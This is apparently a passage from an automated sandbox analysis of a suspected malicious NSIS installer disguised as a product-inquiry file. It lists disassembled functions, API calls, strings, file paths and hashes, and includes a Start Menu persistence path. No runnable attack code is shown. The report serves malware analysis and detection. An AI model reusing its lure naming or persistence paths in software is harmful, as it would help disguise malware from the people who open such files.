175->165 179 40550b-405526 SendMessageA 176->179 180 405361-405367 call 404074 177->180 178->180 179->179 181 405528-405548 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 179->181 180->174 183 40554a-40556a SendMessageA 181->183 183->183 184 40556c-405580 GlobalUnlock SetClipboardData CloseClipboard 183->184 184->165
                              APIs
                              • GetDlgItem.USER32(?,00000403), ref: 00405264
                              • GetDlgItem.USER32(?,000003EE), ref: 00405273
                              • GetClientRect.USER32(?,?), ref: 004052B0
                              • GetSystemMetrics.USER32(00000002), ref: 004052B7
                              • SendMessageA.USER32(?,0000101B,00000000,?), ref: 004052D8
                              • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052E9
                              • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052FC
                              • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040530A
                              • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040531D
                              • ShowWindow.USER32(00000000,?,0000001B,?), ref: 0040533F
                              • ShowWindow.USER32(?,00000008), ref: 00405353
                              • GetDlgItem.USER32(?,000003EC), ref: 00405374
                              • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405384
                              • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040539D
                              • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053A9
                              • GetDlgItem.USER32(?,000003F8), ref: 00405282
                                • Part of subcall function 00404074: SendMessageA.USER32(00000028,?,00000001,00403EA4), ref: 00404082
                              • GetDlgItem.USER32(?,000003EC), ref: 004053C5
                              • CreateThread.KERNELBASE(00000000,00000000,Function_00005199,00000000), ref: 004053D3
                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004053DA
                              • ShowWindow.USER32(00000000), ref: 004053FD
                              • ShowWindow.USER32(?,00000008), ref: 00405404
                              • ShowWindow.USER32(00000008), ref: 0040544A
                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040547E
                              • CreatePopupMenu.USER32 ref: 0040548F
                              • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054A4
                              • GetWindowRect.USER32(?,000000FF), ref: 004054C4
                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054DD
                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405519
                              • OpenClipboard.USER32(00000000), ref: 00405529
                              • EmptyClipboard.USER32 ref: 0040552F
                              • GlobalAlloc.KERNEL32(00000042,?), ref: 00405538
                              • GlobalLock.KERNEL32(00000000), ref: 00405542
                              • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405556
                              • GlobalUnlock.KERNEL32(00000000), ref: 0040556F
                              • SetClipboardData.USER32(00000001,00000000), ref: 0040557A
                              • CloseClipboard.USER32 ref: 00405580
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                              • String ID: Meo Setup: Installing
                              • API String ID: 4154960007-1528984262
                              • Opcode ID: 8d4fafd702a39b7bb38b3c828f48a19304575bcb563af6747f1ba819efe14e22
                              • Instruction ID: f54484deaadc53d59d965fa3ad24bc50442bab3dbb2bc57f5e3c058b1bd1a4dd
                              • Opcode Fuzzy Hash: 8d4fafd702a39b7bb38b3c828f48a19304575bcb563af6747f1ba819efe14e22
                              • Instruction Fuzzy Hash: 10A14871900608BFDB11AF61DE89AAF7F79FB08354F40403AFA41B61A0C7754E519F68

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 493 405768-40578e call 405a26 496 405790-4057a2 DeleteFileA 493->496 497 4057a7-4057ae 493->497 498 405931-405935 496->498 499 4057b0-4057b2 497->499 500 4057c1-4057d1 call 405fa0 497->500 501 4057b8-4057bb 499->501 502 4058df-4058e4 499->502 508 4057e0-4057e1 call 40597f 500->508 509 4057d3-4057de lstrcatA 500->509 501->500 501->502 502->498 504 4058e6-4058e9 502->504 506 4058f3-4058fb call 4062a3 504->506 507 4058eb-4058f1 504->507 506->498 517 4058fd-405911 call 405938 call 405720 506->517 507->498 511 4057e6-4057e9 508->511 509->511 513 4057f4-4057fa lstrcatA 511->513 514 4057eb-4057f2 511->514 516 4057ff-40581d lstrlenA FindFirstFileA 513->516 514->513 514->516 518 405823-40583a call 405963 516->518 519 4058d5-4058d9 516->519 532 405913-405916 517->532 533 405929-40592c call 4050c7 517->533 526 405845-405848 518->526 527 40583c-405840 518->527 519->502 521 4058db 519->521 521->502 530 40584a-40584f 526->530 531 40585b-405869 call 405fa0 526->531 527->526 529 405842 527->529 529->526 535 405851-405853 530->535 536 4058b4-4058c6 FindNextFileA 530->536 544 405880-40588b call 405720 531->544 545 40586b-405873 531->545 532->507 538 405918-405927 call 4050c7 call 405d7f 532->538 533->498 535->531 541 405855-405859 535->541 536->518 539 4058cc-4058cf FindClose 536->539 538->498 539->519 541->531 541->536 553 4058ac-4058af call 4050c7 544->553 554 40588d-405890 544->554 545->536 546 405875-40587e call 405768 545->546 546->536 553->536 555 405892-4058a2 call 4050c7 call 405d7f 554->555 556 4058a4-4058aa 554->556 555->536 556->536
                              APIs
                              • DeleteFileA.KERNELBASE(?,?,76193410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405791
                              • lstrcatA.KERNEL32(0042B878,\*.*,0042B878,?,?,76193410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057D9
                              • lstrcatA.KERNEL32(?,0040A014,?,0042B878,?,?,76193410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004057FA
                              • lstrlenA.KERNEL32(?,?,0040A014,?,0042B878,?,?,76193410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405800
                              • FindFirstFileA.KERNEL32(0042B878,?,?,?,0040A014,?,0042B878,?,?,76193410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405811
                              • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 004058BE
                              • FindClose.KERNEL32(00000000), ref: 004058CF
                              Strings
                              • "C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe", xrefs: 00405768
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405775
                              • \*.*, xrefs: 004057D3
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                              • String ID: "C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                              • API String ID: 2035342205-3295206515
                              • Opcode ID: 7e912b2a9802e711fa8d749573897b654c7dd4461800a881f88780f975a2d178
                              • Instruction ID: 3130a24326b3cf8508e32ba03364d00ecd767046abd4d032e56f6a736b511150
                              • Opcode Fuzzy Hash: 7e912b2a9802e711fa8d749573897b654c7dd4461800a881f88780f975a2d178
                              • Instruction Fuzzy Hash: AD519131900A05EAEF217B618C85BAF7A78DF42314F14817FF841B61E2D73C4952EE69
                              APIs
                              • CoCreateInstance.OLE32(0040851C,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402153
                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402202
                              Strings
                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Spore, xrefs: 00402193
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort\Spore
                              • API String ID: 123533781-3990153789
                              • Opcode ID: 00c6f69d0c611c55acbaeef9457f2e2871c7d6f88ec9903dd4d9a479ec053a50
                              • Instruction ID: f4f88eda2e3132aa5920e2584167a74d80893369f9b2333c3bffcb98084fb778
                              • Opcode Fuzzy Hash: 00c6f69d0c611c55acbaeef9457f2e2871c7d6f88ec9903dd4d9a479ec053a50
                              • Instruction Fuzzy Hash: 44510771A00208BFCB10DFE4C989A9D7BB6AF48318F2085AAF515EB2D1DA799941CF54
                              APIs
                              • FindFirstFileA.KERNELBASE(76193410,0042C0C0,0042BC78,00405A69,0042BC78,0042BC78,00000000,0042BC78,0042BC78,76193410,?,C:\Users\user\AppData\Local\Temp\,00405788,?,76193410,C:\Users\user\AppData\Local\Temp\), ref: 004062AE
                              • FindClose.KERNEL32(00000000), ref: 004062BA
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Find$CloseFileFirst
                              • String ID:
                              • API String ID: 2295610775-0
                              • Opcode ID: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
                              • Instruction ID: 1e2c953ed1559e2f686ededff4fae2b078191910b4ed7f61f032671a7c701700
                              • Opcode Fuzzy Hash: f33084ac43254253387421f94672507a8f359bb84d60abe7f61aad8f4daa312f
                              • Instruction Fuzzy Hash: ACD01236519020ABC21027787E0C84B7A589F053347118A7BF4A6F21E0C7348C6686DC

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 185 403b6b-403b7d 186 403b83-403b89 185->186 187 403cbe-403ccd 185->187 186->187 188 403b8f-403b98 186->188 189 403d1c-403d31 187->189 190 403ccf-403d17 GetDlgItem * 2 call 40403f SetClassLongA call 40140b 187->190 193 403b9a-403ba7 SetWindowPos 188->193 194 403bad-403bb0 188->194 191 403d71-403d76 call 40408b 189->191 192 403d33-403d36 189->192 190->189 204 403d7b-403d96 191->204 196 403d38-403d43 call 401389 192->196 197 403d69-403d6b 192->197 193->194 199 403bb2-403bc4 ShowWindow 194->199 200 403bca-403bd0 194->200 196->197 218 403d45-403d64 SendMessageA 196->218 197->191 203 40400c 197->203 199->200 205 403bd2-403be7 DestroyWindow 200->205 206 403bec-403bef 200->206 213 40400e-404015 203->213 211 403d98-403d9a call 40140b 204->211 212 403d9f-403da5 204->212 214 403fe9-403fef 205->214 208 403bf1-403bfd SetWindowLongA 206->208 209 403c02-403c08 206->209 208->213 216 403cab-403cb9 call 4040a6 209->216 217 403c0e-403c1f GetDlgItem 209->217 211->212 221 403fca-403fe3 DestroyWindow EndDialog 212->221 222 403dab-403db6 212->222 214->203 220 403ff1-403ff7 214->220 216->213 223 403c21-403c38 SendMessageA IsWindowEnabled 217->223 224 403c3e-403c41 217->224 218->213 220->203 226 403ff9-404002 ShowWindow 220->226 221->214 222->221 227 403dbc-403e09 call 405fc2 call 40403f * 3 GetDlgItem 222->227 223->203 223->224 228 403c43-403c44 224->228 229 403c46-403c49 224->229 226->203 255 403e13-403e4f ShowWindow KiUserCallbackDispatcher call 404061 EnableWindow 227->255 256 403e0b-403e10 227->256 233 403c74-403c79 call 404018 228->233 234 403c57-403c5c 229->234 235 403c4b-403c51 229->235 233->216 238 403c92-403ca5 SendMessageA 234->238 240 403c5e-403c64 234->240 235->238 239 403c53-403c55 235->239 238->216 239->233 243 403c66-403c6c call 40140b 240->243 244 403c7b-403c84 call 40140b 240->244 253 403c72 243->253 244->216 252 403c86-403c90 244->252 252->253 253->233 259 403e51-403e52 255->259 260 403e54 255->260 256->255 261 403e56-403e84 GetSystemMenu EnableMenuItem SendMessageA 259->261 260->261 262 403e86-403e97 SendMessageA 261->262 263 403e99 261->263 264 403e9f-403ed9 call 404074 call 403b4c call 405fa0 lstrlenA call 405fc2 SetWindowTextA call 401389 262->264 263->264 264->204 275 403edf-403ee1 264->275 275->204 276 403ee7-403eeb 275->276 277 403f0a-403f1e DestroyWindow 276->277 278 403eed-403ef3 276->278 277->214 279 403f24-403f51 CreateDialogParamA 277->279 278->203 280 403ef9-403eff 278->280 279->214 281 403f57-403fae call 40403f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 279->281 280->204 282 403f05 280->282 281->203 287 403fb0-403fc3 ShowWindow call 40408b 281->287 282->203 289 403fc8 287->289 289->214
                              APIs
                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BA7
                              • ShowWindow.USER32(?), ref: 00403BC4
                              • DestroyWindow.USER32 ref: 00403BD8
                              • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BF4
                              • GetDlgItem.USER32(?,?), ref: 00403C15
                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C29
                              • IsWindowEnabled.USER32(00000000), ref: 00403C30
                              • GetDlgItem.USER32(?,00000001), ref: 00403CDE
                              • GetDlgItem.USER32(?,00000002), ref: 00403CE8
                              • SetClassLongA.USER32(?,000000F2,?), ref: 00403D02
                              • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D53
                              • GetDlgItem.USER32(?,00000003), ref: 00403DF9
                              • ShowWindow.USER32(00000000,?), ref: 00403E1A
                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E2C
                              • EnableWindow.USER32(?,?), ref: 00403E47
                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E5D
                              • EnableMenuItem.USER32(00000000), ref: 00403E64
                              • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E7C
                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E8F
                              • lstrlenA.KERNEL32(Meo Setup: Installing,?,Meo Setup: Installing,00000000), ref: 00403EB9
                              • SetWindowTextA.USER32(?,Meo Setup: Installing), ref: 00403EC8
                              • ShowWindow.USER32(?,0000000A), ref: 00403FFC
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                              • String ID: Meo Setup: Installing
                              • API String ID: 3282139019-1528984262
                              • Opcode ID: d4f5cfe3c3c51a6681682eed2f77fa7a99c8bad0dac829668d753dca6044b2b8
                              • Instruction ID: 5f88be39a50f3dd075596c1c1d09af532afca629c850b085fe9e60943a8810da
                              • Opcode Fuzzy Hash: d4f5cfe3c3c51a6681682eed2f77fa7a99c8bad0dac829668d753dca6044b2b8
                              • Instruction Fuzzy Hash: B7C19171604605ABEB206F62DE45E2B3FBCEB4570AF40053EF642B11E1CB799942DB1D

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 290 4037ce-4037e6 call 406338 293 4037e8-4037f8 call 405efe 290->293 294 4037fa-40382b call 405e87 290->294 302 40384e-403877 call 403a93 call 405a26 293->302 298 403843-403849 lstrcatA 294->298 299 40382d-40383e call 405e87 294->299 298->302 299->298 308 40387d-403882 302->308 309 4038fe-403906 call 405a26 302->309 308->309 310 403884-4038a8 call 405e87 308->310 315 403914-403939 LoadImageA 309->315 316 403908-40390f call 405fc2 309->316 310->309 319 4038aa-4038ac 310->319 317 4039ba-4039c2 call 40140b 315->317 318 40393b-40396b RegisterClassA 315->318 316->315 332 4039c4-4039c7 317->332 333 4039cc-4039d7 call 403a93 317->333 321 403971-4039b5 SystemParametersInfoA CreateWindowExA 318->321 322 403a89 318->322 324 4038bd-4038c9 lstrlenA 319->324 325 4038ae-4038bb call 405963 319->325 321->317 330 403a8b-403a92 322->330 326 4038f1-4038f9 call 405938 call 405fa0 324->326 327 4038cb-4038d9 lstrcmpiA 324->327 325->324 326->309 327->326 331 4038db-4038e5 GetFileAttributesA 327->331 336 4038e7-4038e9 331->336 337 4038eb-4038ec call 40597f 331->337 332->330 343 403a60-403a61 call 405199 333->343 344 4039dd-4039f7 ShowWindow call 4062ca 333->344 336->326 336->337 337->326 347 403a66-403a68 343->347 351 403a03-403a15 GetClassInfoA 344->351 352 4039f9-4039fe call 4062ca 344->352 349 403a82-403a84 call 40140b 347->349 350 403a6a-403a70 347->350 349->322 350->332 353 403a76-403a7d call 40140b 350->353 356 403a17-403a27 GetClassInfoA RegisterClassA 351->356 357 403a2d-403a50 DialogBoxParamA call 40140b 351->357 352->351 353->332 356->357 360 403a55-403a5e call 40371e 357->360 360->330
                              APIs
                                • Part of subcall function 00406338: GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                                • Part of subcall function 00406338: GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                              • lstrcatA.KERNEL32(1033,Meo Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Meo Setup: Installing,00000000,00000002,76193410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe",00000000), ref: 00403849
                              • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort,1033,Meo Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Meo Setup: Installing,00000000,00000002,76193410), ref: 004038BE
                              • lstrcmpiA.KERNEL32(?,.exe), ref: 004038D1
                              • GetFileAttributesA.KERNEL32(Call), ref: 004038DC
                              • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort), ref: 00403925
                                • Part of subcall function 00405EFE: wsprintfA.USER32 ref: 00405F0B
                              • RegisterClassA.USER32(0042EBA0), ref: 00403962
                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040397A
                              • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039AF
                              • ShowWindow.USER32(00000005,00000000), ref: 004039E5
                              • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBA0), ref: 00403A11
                              • GetClassInfoA.USER32(00000000,RichEdit,0042EBA0), ref: 00403A1E
                              • RegisterClassA.USER32(0042EBA0), ref: 00403A27
                              • DialogBoxParamA.USER32(?,00000000,00403B6B,00000000), ref: 00403A46
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                              • String ID: "C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Bemangle\parsleywort$Call$Control Panel\Desktop\ResourceLocale$Meo Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                              • API String ID: 1975747703-1457800325
                              • Opcode ID: b2ce040b6a925dc6c5459230d15a4a62e33f579bfde2c301426bad79e665be96
                              • Instruction ID: 26e7699ed4e6b10e00d4509f8022fed07cb2a9a1b54ab9853cf40adcb97aba69
                              • Opcode Fuzzy Hash: b2ce040b6a925dc6c5459230d15a4a62e33f579bfde2c301426bad79e665be96
                              • Instruction Fuzzy Hash: 2B61C970340601BED620BB669D46F373EACEB54749F80447FF985B22E2CB7C59069A2D

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 364 402d63-402db1 GetTickCount GetModuleFileNameA call 405b39 367 402db3-402db8 364->367 368 402dbd-402deb call 405fa0 call 40597f call 405fa0 GetFileSize 364->368 369 402f95-402f99 367->369 376 402df1 368->376 377 402ed8-402ee6 call 402cff 368->377 378 402df6-402e0d 376->378 383 402ee8-402eeb 377->383 384 402f3b-402f40 377->384 380 402e11-402e1a call 4031ae 378->380 381 402e0f 378->381 390 402e20-402e27 380->390 391 402f42-402f4a call 402cff 380->391 381->380 386 402eed-402f05 call 4031c4 call 4031ae 383->386 387 402f0f-402f39 GlobalAlloc call 4031c4 call 402f9c 383->387 384->369 386->384 410 402f07-402f0d 386->410 387->384 415 402f4c-402f5d 387->415 394 402ea3-402ea7 390->394 395 402e29-402e3d call 405af4 390->395 391->384 399 402eb1-402eb7 394->399 400 402ea9-402eb0 call 402cff 394->400 395->399 413 402e3f-402e46 395->413 406 402ec6-402ed0 399->406 407 402eb9-402ec3 call 4063ef 399->407 400->399 406->378 414 402ed6 406->414 407->406 410->384 410->387 413->399 419 402e48-402e4f 413->419 414->377 416 402f65-402f6a 415->416 417 402f5f 415->417 420 402f6b-402f71 416->420 417->416 419->399 421 402e51-402e58 419->421 420->420 422 402f73-402f8e SetFilePointer call 405af4 420->422 421->399 423 402e5a-402e61 421->423 426 402f93 422->426 423->399 425 402e63-402e83 423->425 425->384 427 402e89-402e8d 425->427 426->369 428 402e95-402e9d 427->428 429 402e8f-402e93 427->429 428->399 430 402e9f-402ea1 428->430 429->414 429->428 430->399
                              APIs
                              • GetTickCount.KERNEL32 ref: 00402D74
                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe,00000400), ref: 00402D90
                                • Part of subcall function 00405B39: GetFileAttributesA.KERNELBASE(00000003,00402DA3,C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe,80000000,00000003), ref: 00405B3D
                                • Part of subcall function 00405B39: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                              • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe,C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe,80000000,00000003), ref: 00402DDC
                              Strings
                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F3B
                              • soft, xrefs: 00402E51
                              • Inst, xrefs: 00402E48
                              • "C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe", xrefs: 00402D63
                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00402D6A
                              • Error launching installer, xrefs: 00402DB3
                              • C:\Users\user\Desktop, xrefs: 00402DBE, 00402DC3, 00402DC9
                              • Null, xrefs: 00402E5A
                              • C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe, xrefs: 00402D7A, 00402D89, 00402D9D, 00402DBD
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
